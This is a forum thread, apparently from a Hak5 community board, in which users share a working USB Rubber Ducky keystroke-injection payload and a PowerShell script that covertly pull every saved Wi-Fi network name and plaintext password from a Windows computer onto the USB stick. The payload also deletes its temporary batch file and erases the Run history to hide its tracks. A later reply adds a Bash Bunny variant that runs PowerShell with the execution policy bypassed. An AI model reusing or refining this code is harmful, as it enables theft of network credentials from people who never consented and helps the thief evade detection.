Search the Community

So I have been working on a script (admittedly for a while, this is my first script) to grab wifi names and passwords off computers and dump them to a text files. So fair I have it working great, it grabs every wireless Internet connection that the computer has ever made and it dumps it straight back to usb within seconds, to grab and go. I just need help with one thing... How to hide the powershell window and is there anyway of making this script better (I already know i can use powershell to sent txt files to servers or through email i just think its easier with such a simple script to dump it straight back to usb)? Here is the Script

My first script using the Ducky... Beg stole and borrowed from other peoples code and amended to get to what I wanted, most of the code is form Darren Kitchen's 15 second password hack for bits around how to use Twin Ducky and how to keep use and save files whilst mounting the Ducky as a USB storage device... It's not perfect but hits the mark for what I currently need. To summarise: * It creates a .BAT file in %TEMP% which finds the assigned drive of the DUCKY * It then uses Select-String cmdlet to get the password for the wireless networks on the target machine * Saves this (albeit slightly messily) to Output.txt on the Ducky * Finally gets rid of the TEMP file and history in the run command window Look forward to comments and anything anyone can suggest to speed this up and make it better. Cheers Audie Ducky Script REM Author: Audie2180 REM Ducky WIFI credential plain text password report: 1.0 REM Target: Windows 10 REM Firmware: Twin Duck 2.1 REM Description: Runs Powershell to get wifi password using ConvertFrom-String, saves to notepad, saves to Ducky, Clears up tracks DELAY 1000 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM ----Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM ----Make batch file that waits for SD card to mount. REM ----Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM ----Continue script STRING Powershell %DuckyDrive%\a.ps1 > %DuckyDrive%\Output.txt ENTER CONTROL z ENTER REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Run BAT file DELAY 1000 GUI r DELAY 500 STRING %TEMP%/DuckyWait.bat DELAY 500 ENTER DELAY 800 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM --- Clean up, close CMD, delete tmp files, remove command prompt hist REM --- Cleanup file created DELAY 500 STRING del /f %TEMP%\DuckyWait.bat ENTER REM ----Clear the Run history and exit DELAY 500 STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Flash CAPSLOCK CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK ... which obviously needs to be compiled as an inject.bin, but also needs the following Powershell file... a.ps1 #Make a list with all WiFi SSID's and passwords stored locally on Windows OS. $output = netsh.exe wlan show profiles $profileRows = $output | Select-String -Pattern 'All User Profile' $profileNames = New-Object System.Collections.ArrayList #for each profile name get the SSID and password for($i = 0; $i -lt $profileRows.Count; $i++){ $profileName = ($profileRows[$i] -split ":")[-1].Trim() $profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear $SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name' $profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"' $passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content' if($passwordSearchResult){ $profilePw = ($passwordSearchResult -split ":")[-1].Trim() } else { $profilePw = '' } $networkObject = New-Object -TypeName psobject -Property @{ ProfileName = $profileName SSID = $profileSSID Password = $profilePw } $profileNames.Add($networkObject) } $profileNames | Sort-Object ProfileName | Select-Object ProfileName, SSID, Password

Hi bunny lovers, the InfoGrabber is very nice and i have optimized the payload commands a little bit LED SETUP ATTACKMODE HID STORAGE # Set your language here DUCKY_LANG de GET SWITCH_POSITION RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" LED G #Green means good to go but there is no way for me to see any wifi password inside. only: when i run the: netsh wlan show profile name=blabla-wifi key=clear i got an .xml file with the password inside. pls help pros! thx, rowie